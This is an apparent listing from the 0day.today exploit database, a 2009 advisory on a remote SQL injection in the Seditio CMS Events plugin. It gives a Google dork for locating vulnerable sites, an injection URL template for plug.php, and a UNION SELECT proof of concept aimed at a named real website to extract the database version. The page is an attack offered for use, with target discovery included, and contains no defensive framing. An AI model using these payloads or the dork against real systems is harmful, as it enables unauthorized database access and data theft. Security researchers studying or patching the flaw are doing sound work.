[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Seditio CMS Events Plugin (c) Remote SQL Injection Vulnerability

Author
OoN_Boy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5067
Category
web applications
Date add
19-04-2009
Platform
unsorted
================================================================
Seditio CMS Events Plugin (c) Remote SQL Injection Vulnerability
================================================================



[+]=================================================================[+]
		[x]Title    : Seditio Events Remote SQL Injection
			      Seditio Events Plugin Remote SQL Injection
		[x]Software : Seditio CMS
		[x]Vendor   : www.neocrome.ne
		[x]Date     : 17 April 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
[+]=================================================================[+]
		[x] Google Dork

		"Powered by Seditio"
[+]=================================================================[+]
		[x] Exploit

		http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
[+]=================================================================[x]
		[x]Poc
		
		http://thespider.neocrome.org/plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*
[+]=================================================================[+]




#  0day.today [2024-09-28]  #